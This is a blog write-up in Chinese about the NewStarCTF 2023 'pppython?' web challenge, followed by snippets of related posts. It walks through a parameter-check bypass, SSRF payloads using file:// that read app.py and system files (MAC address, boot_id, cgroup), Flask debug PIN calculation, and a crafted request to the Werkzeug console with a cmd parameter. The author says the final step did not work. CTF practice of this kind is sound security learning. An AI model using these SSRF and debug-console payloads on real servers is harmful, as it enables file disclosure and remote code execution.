每周练手-[NewStarCTF 2023 公开赛道]pppython?

已于 2024-03-05 12:34:08 修改
阅读量1.2k 收藏 12
点赞数 28
文章标签: 服务器 linux 前端
于 2024-03-04 21:38:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60905276/article/details/136451774
版权

它首先检查请求中的 "hint" 参数是否等于 ["your?", "mine!", "hint!!"](以数组的形式)。如果相等,就会发送一个HTTP响应头,并执行系统命令 "ls / -la" 来列出根目录的文件,之后退出。

所以构造出来的参数是?hint[0]=your?&hint[1]=mine!&hint[2]=hint!!

发现是需要root权限才能查看,现在权限不能查看flag。但是我们发现了app.py。我们可以使用ssrf查看app.py的内容。

?url=file:///app.py&lolita[]=

其实这里我们就可以伪造session拿到flag,但是我们没有cookie,无法伪造session。

但是我们发现debug开启监听1314端口。我们可以通过计算Pin码进入调试模式。解释一下pin码是在开启debug模式下,进行代码调试模式所需的进入密码。

pin码的生成可以看看这个大佬说的。

关于ctf中flask算pin总结_ctf web 在运行服务器的shell的标准输出上找到打印出来的pin-CSDN博客

总结是要六要素

1.username 启动这个Flask的用户
2.modname 默认flask.app
3.appname 默认Flask
4.moddir flask目录下面app.py的绝对路径,可以通过报错拿到
5.uuidnode mac地址的十进制表达
6.machine_id 机器码

1.我们得知用户是root

2.默认flask.app

3.Flask

4.各种方法试了一下,反正我是没有得到报错出来的答案。试一试默认的路径吧。

/usr/local/lib/python3.8/site-packages/flask/app.py

5.mac地址,?url=file:///sys/class/net/eth0/address&lolita[]=

ce:95:05:d6:9b:3a    十进制后是  206149521415558

6.机器码

机器码分为两个部分,我们可以先读取/etc/machine-id,然后再接上/proc/self/cgroup。

幽默。

我们再试试另一个/?url=file:///proc/sys/kernel/random/boot_id。

7aa87637-021d-4b97-b47c-cf51e1a2824e

/proc/self/cgroup 只读取第一行,并以从右边算起的第一个/为分隔符

docker-f4def8cc7e4dbbce400d0b30b6b90fe29464e818a404561be81758f6c0b0985e.scope

然后拿计算pin值的脚本计算,脚本上面分享的那个博主里有就不再放了。

pin=549-149-762  Cookie=__wzdfbd1bef74f38556470cd=1709558016|0b7aa1ba2004

然后就是传参。

这里我们要去获取frm和s的值

  • frm如果没有报错信息的话值为0
  • s的值可以直接访问./console,然后查看源码的SECRET值

?url=http://localhost:1314/console&lolita[]=


s=1N8WyDmlDm9591B9BreE

/?lolita[]=Cookie=__wzdfbd1bef74f38556470cd=1709558016|0b7aa1ba2004&url=http://127.0.0.1:1314/console?%26__debugger__=yes%26pin=549-149-762%26cmd=print(2)%26frm=0%26s=1N8WyDmlDm9591B9BreE

但是我不知道哪一步做错了,在传参后始终得不到flag。

欢迎大家讨论!

留将一面与花
关注
Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3219
ssti的payload还是不太会写… Flask debug 模式生成pin码 计算pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
NewStarCTF 2023 公开赛 Week1,数据结构与算法面试题
04-08 817
刚开始以为是摩斯密码,看了B神博客才知:WhiteSpace,是一种只用空白字符(空格,TAB和回车)编程的语言,而其它可见字符统统为注释。把空白字符复制进去网站,点击run即可。
NewStarCTF 2023 公开赛 Week2_newstarctf 2023 week2 pzthon(1)
2401_83947398的博客
04-18 982
时,得到的结果只是phpinfo()这个字符串,它只是将我们构造的array_rand(array_flip(getallheaders()))给执行了而已,所以我们要先用一个eval将array_rand(array_flip(getallheaders()))变为phpinfo();如果在后面,可以用array_reverse()将数组反转过来之后,再用current拿它,它在中间就不好搞了,又不能用next套娃,因为next的参数要是数组,第一次next完成之后就不是数组了,变成字符串了。
buuctf_练[GYCTF2020]FlaskApp
m0_66225311的博客
10-26 769
`ssti`的`python debug`的`PIN`码计算,调用`debug`命令行执行命令。存在`ssti`注入就能进行命令执行,使用拼接操作绕过关键字过滤`['o'+'s']`。不同版本的`python`计算pin码的代码不同。`python`的模板注入可以通过for循环遍历子类特征名的方式,来寻找能够执行命令的子类模块
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1262
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
[ctfshow web入门]常用姿势801-806
weixin_45751765的博客
04-14 4916
php单引号和双引号包裹的区别
华为中国大学生ICT大赛-网络技术赛-WLAN知识资料
09-22
《华为中国大学生ICT大赛-网络技术赛-WLAN知识资料》 在当今信息化社会,无线局域网(WLAN)已经成为我们日常生活和工作中不可或缺的一部分。华为作为全球领先的ICT解决方案提供商,其主办的“华为中国大学生ICT...
NewStarCTF 2023 公开赛 Week1(1),View的这些基础知识你必须要知
04-08 834
c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag from secret import flag from Crypto.Util.number import *p = getPrime(1024) q = getPrime(1024)d = getPrime(32) e = inverse(d, (p-1)*(q-1)) n = p*q m = bytes_to_long(flag)c = po
NewStarCTF 2023 第一阶段公开赛部分wp
10-02
这是官方的wp文件,需要的可以下载查看
20210830-东北证券-火星人-300894-如何在集成灶赛脱颖而出?.pdf
08-31
火星人(300894)是一家在集成灶领域表现突出的家用电器企业,其在集成灶行业的地位显著,得益于行业快速发展以及自身的竞争优势。集成灶行业在过去五年间保持着28%的销售量复合增长率和30%的销售额复合增长率,预示着...
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin
m0_64180167的博客
12-07 900
题不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代码可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代码这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。
flask的pin码攻击——新版本下pin码的生成方式
qq_42303523的博客
04-17 4232
在打*CTF的时候,一明显是flask的pin码生成进而RCE的题目卡了半天,最后发现是新版本的flask的pin码生成方式有了一定的改变,这里做一下记录。 我们常用的生成pin码的脚本如下: import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', get
关于ctf中flask算pin总结
arcuied
02-20 5300
flask pin的相关问题
2021-02-23
m0_53314778的博客
02-23 393
[GYCTF2020]FlaskApp 知识点 Flask模板注入中debug模式下pin码的获取和利用 Pin (代码识别码) debug模式,为什么assert()在debug模式下才有用? ssti的绕过(拼接字符串,倒序切片,内置对象、函数) WP: 前言:Flask开启debug模式等于给黑客留了后门 参考链接:Flask开启debug模式 Flask在生产环境中开启debug模式是一件非常危险的事,主要有3点原因: 1、会泄露当前报错页面的源码,可供审计挖掘其他漏洞 2、会泄露W
Python-flask库开启debug调试导致PIN码破解泄露getshell】
giaogiaohuohua的博客
01-25 1897
2、这里又有一个坑点,配置好了python之后呢,既然是破解PIN码,肯定是需要安装flask,然后看看对应版本中PIN的算法,这里直接使用pip安装会报错,pip会说版本太低了,要先升级,升级完成之后就会报错如下。注:flask在遇到报错时,如果开启了debug模式,就可以在web上建立一个交互式shell进行python调试,但是需要PIN码,PIN码是可以破解的。4、得到全部参数后,运行脚本,将得到的PIN码输入到,即可开启debug调试模式。注:不同的python版本,1、python的版本。
flask计算pin码
weixin_63231007的博客
07-13 3891
python flask-pin码介绍 & CTF中 flask-pin码计算的应用
通过[NewStarCTF 2023 公开赛]POP Gadget,精析PHP反序列化POP链的构造(新手可学习)
2301_79575827的博客
04-24 1151
php反序列化POP链详细构造
[NewStarCTF 2023 公开赛]新建Python文件99
最新发布
QxQv4的博客
06-26 346
打开kali并把 Stegosaurus 导入进kali(还有flag.pyc!经过逆向后会获得以下代码,实际上和flag一点关系也没用。这是一新题,暂时没有教程,我在此抛砖引玉。注意别在Windows里面尝试进行解密,无效!点进入后会发现一个pyc文件,无法直接读取。如果能排除各种意外,这题挺简单的。你甚至可以看到原题(焯!首先下载 zip 并解压。
NewStarCTF2023
2301_80115097的博客
11-13 3774
从Begin的__destruct析构函数作为起点开始,构造POP链触发到WhiteGod的__unset方法,__unset方法中存在一个函数的动态调用,可以实现RCE。由此可以得到剩下的两个信息,index.php文件的page参数存在任意文件包含漏洞,攻击者通过这个漏洞包含pearcmd.php向服务器中写入了名为wh1t3g0d.php的WebShell。发第一个,有回显,第二个,没回显,说明页面可以根据if判断的结果回显两种(真假)内容,因此是布尔盲注。
NewStarCTF 2023 web挑战解析:HTTP与PHP技巧
"NewStarCTF 2023 第一阶段公开赛的解题WriteUp,涵盖Web安全领域的多个知识点,包括Flask应用中的信息泄露、HTTP请求方式与头信息的利用,以及PHP的弱类型比较、加密函数数组绕过和函数特性利用等。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值